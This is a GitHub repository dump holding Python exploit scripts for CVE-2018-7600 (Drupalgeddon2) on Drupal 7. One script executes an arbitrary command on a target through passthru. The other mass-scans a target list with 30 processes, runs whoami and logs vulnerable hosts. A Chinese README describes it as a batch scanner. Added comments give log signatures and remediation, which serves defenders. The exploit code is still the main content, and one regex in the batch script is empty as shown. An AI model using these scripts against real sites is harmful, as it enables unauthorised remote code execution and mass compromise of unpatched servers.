├── CVE-2018-7600-Drupal7-EXP.py
├── CVE-2018-7600-Drupal7.py
├── Drupal7-poc.png
└── README.md


/CVE-2018-7600-Drupal7-EXP.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
# _*_ coding:utf-8 _*_

# Single-target proof of concept for CVE-2018-7600 on Drupal 7 (per the file
# name and the README on this page). It issues two POST requests: the first
# submits the password-reset form with extra "name[#...]" query parameters and
# reads the returned form_build_id; the second posts that id to
# q=file/ajax/name/#value/<form_build_id> and prints the start of the response.
#
# Defender notes:
# - Log signature: a POST with q=user/password whose query string carries keys
#   such as name[#post_render][], name[#type], name[#markup], followed by a
#   POST with q=file/ajax/name/#value/<id>. requests percent-encodes these, so
#   access logs show '#' as %23 and '[' / ']' as %5B / %5D.
# - Request parameter keys that begin with '#' are the signal to alert on;
#   an ordinary form submission has no reason to contain them.
# - Remediation is the Drupal core update that fixes CVE-2018-7600.

import requests
import argparse
from bs4 import BeautifulSoup

def get_args():
    """Parse the command line and return the argparse namespace.

    Options: positional ``target`` (site URL), ``-c/--command`` (default
    "id"), ``-f/--function`` (default "passthru"), ``-p/--proxy`` (default
    empty string).
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("target", help="URL of target Drupal site (ex: http://target.com/)")
    parser.add_argument("-c", "--command", default="id", help="Command to execute (default = id)")
    parser.add_argument("-f", "--function", default="passthru", help="Function to use as attack vector (default = passthru)")
    parser.add_argument("-p", "--proxy", default="", help="Configure a proxy in the format http://127.0.0.1:8080/ (default = none)")
    args = parser.parse_args()
    return args

def pwn_target(target, function, command, proxy):
    """Send the two-request sequence to ``target`` and print the result.

    ``function`` is sent as the ``name[#post_render][]`` value and ``command``
    as the ``name[#markup]`` value of the first request. ``proxy`` is used for
    both http and https. Nothing is returned; output goes to stdout. Any
    exception raised while parsing or during the second request is reported
    and re-raised.
    """
    # Silences urllib3 warnings, including the one emitted for verify=False.
    requests.packages.urllib3.disable_warnings()
    proxies = {'http': proxy, 'https': proxy}
    print('[*] Poisoning a form and including it in cache.')
    # Request 1: the '#'-prefixed keys travel in the query string, the form
    # submission itself in the POST body.
    get_params = {'q':'user/password', 'name[#post_render][]':function, 'name[#type]':'markup', 'name[#markup]': command}
    post_params = {'form_id':'user_pass', '_triggering_element_name':'name', '_triggering_element_value':'', 'opz':'E-mail new Password'}
    # verify=False: the server's TLS certificate is not validated.
    r = requests.post(target, params=get_params, data=post_params, verify=False, proxies=proxies)
    soup = BeautifulSoup(r.text, "html.parser")
    try:
        # soup.find returns None when the form is absent; form.find then
        # raises AttributeError, which is handled by the bare except below.
        form = soup.find('form', {'id': 'user-pass'})
        form_build_id = form.find('input', {'name': 'form_build_id'}).get('value')
        if form_build_id:
            print('[*] Poisoned form ID: ' + form_build_id)
            print('[*] Triggering exploit to execute: ' + command)
            # Request 2: the id from request 1 is sent both in the q path and
            # in the POST body.
            get_params = {'q':'file/ajax/name/#value/' + form_build_id}
            post_params = {'form_build_id':form_build_id}
            r = requests.post(target, params=get_params, data=post_params, verify=False, proxies=proxies)
            # Keep only the text that precedes the AJAX "settings" command.
            parsed_result = r.text.split('[{"command":"settings"')[0]
            print(parsed_result)
    except:
        # Bare except: every exception type is caught, reported, re-raised.
        print("ERROR: Something went wrong.")
        raise

def main():
    """Parse arguments and run pwn_target.

    Not called anywhere in this file; the ``__main__`` guard below repeats
    the same two statements instead.
    """
    args = get_args()
    pwn_target(args.target.strip(), args.function.strip(), args.command.strip(), args.proxy.strip())


if __name__ == '__main__':
    args = get_args()
    pwn_target(args.target.strip(), args.function.strip(), args.command.strip(), args.proxy.strip())

--------------------------------------------------------------------------------
/CVE-2018-7600-Drupal7.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
# _*_ coding:utf-8 _*_

# Batch variant of the CVE-2018-7600 Drupal 7 check: the README on this page
# describes it as a bulk scanner that wraps a fixed `whoami` command. Targets
# are read from target.txt and positive results appended to result.txt.
#
# Defender notes:
# - The request sequence is the same as in the single-target script: a POST
#   with q=user/password and name[#post_render][] / name[#type] /
#   name[#markup] query keys, then a POST with q=file/ajax/name/#value/<id>.
# - Up to 30 worker processes run in parallel (see poolmana), so a scanned
#   network sees these pairs in bursts from one source.
# - Remediation is the Drupal core update that fixes CVE-2018-7600.

'''
____ _ _ _ _ __ __ _
| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __
| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ <
|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\
'''

import re
import requests
from multiprocessing import Pool, Manager

# Browser-like User-Agent. NOTE(review): neither requests.post call in this
# listing passes headers=, so this dict is unused here and the traffic carries
# requests' default User-Agent.
headers = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0",}

def saveinfo(result):
    """Append ``result`` plus a newline to result.txt; do nothing if falsy.

    Registered as the apply_async callback in poolmana, so it receives the
    return value of poc (a string on a hit, None otherwise).
    """
    if result:
        fw=open('result.txt','a')
        fw.write(result+'\n')
        fw.close()

def poc(target,q):
    """Run the two-request check against ``target``.

    Returns a description string when the second response yields non-empty
    text before the AJAX "settings" command; otherwise puts ``target`` on the
    queue ``q`` and returns None. All exceptions inside the try block are
    swallowed, so an unreachable host is indistinguishable from a host that
    did not respond as expected.
    """
    # Runtime message (Chinese): "Loading target:".
    print('加载目标:'+target)
    requests.packages.urllib3.disable_warnings()
    # Fixed payload: function 'passthru', command 'whoami'.
    get_params = {'q':'user/password', 'name[#post_render][]':'passthru', 'name[#type]':'markup', 'name[#markup]': 'whoami'}
    post_params = {'form_id':'user_pass', '_triggering_element_name':'name', '_triggering_element_value':'', 'opz':'E-mail new Password'}
    try:
        # verify=False: no TLS certificate validation. Redirects are not
        # followed on this first request only.
        r = requests.post(target, params=get_params, data=post_params, verify=False,allow_redirects=False)
        # NOTE(review): the pattern literal is empty as shown on this page
        # (presumably lost in extraction). As written, findall returns empty
        # strings, so form_build_id[0] is '' below.
        rule1 = re.compile(r'')
        form_build_id = rule1.findall(r.text)
        if form_build_id:
            get_params = {'q':'file/ajax/name/#value/' + form_build_id[0]}
            post_params = {'form_build_id':form_build_id[0]}
            r = requests.post(target, params=get_params, data=post_params, verify=False)
            # Capture whatever precedes the AJAX "settings" command after all
            # newlines, spaces, carriage returns and tabs are removed.
            rule2 = re.compile(r'(.*?)\[{"command":"settings","settings":.*?')
            parsed_result=rule2.findall(r.text.replace('\n','').replace(' ','').replace('\r','').replace('\t',''))
            if parsed_result and len(parsed_result[0])>0:
                print(("Found a vulnerable target:"+target+"\tPermissions of the current user is:"+parsed_result[0]))
                return ("Found a vulnerable target:"+target+"\tPermissions of the current user is:"+parsed_result[0])
    except:
        # Bare except: network and parsing errors are silently discarded.
        pass
    # NOTE(review): indentation is not recoverable from this page; placed at
    # function level (after the try/except) -- confirm against the repository.
    # Nothing in this file reads from q.
    q.put(target)


def poolmana():
    """Read target.txt and dispatch one poc call per line to a 30-process pool.

    Only a trailing newline is removed from each line. Results are handed to
    saveinfo via the apply_async callback. Blocks until all workers finish.
    """
    p = Pool(30)
    q = Manager().Queue()
    fr = open('target.txt', 'r')
    ips=fr.readlines()
    fr.close()
    for i in ips:
        i=i.replace('\n','')
        p.apply_async(poc, args=(i, q,),callback=saveinfo)
    p.close()
    p.join()

def run():
    """Entry point; delegates to poolmana."""
    poolmana()


if __name__ == '__main__':
    run()
--------------------------------------------------------------------------------
/Drupal7-poc.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rabbitmask/CVE-2018-7600-Drupal7/9bc2878d241a52de3e7e0382d68bd846fe70521a/Drupal7-poc.png

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# CVE-2018-7600-Drupal7
CVE-2018-7600【Drupal7】批量扫描工具。

主文件:CVE-2018-7600-Drupal7.py
其实本质是封装了`whoami`的exp
Drupal7/8的原理是一样的但该脚本当是只做了7的适配
提供`target.txt`作为目标输入,结果自动输出到`result.txt`文件
因为是好久前写的脚本现在分享一下,有不够精致的地方还请多多包涵

##### Demo:

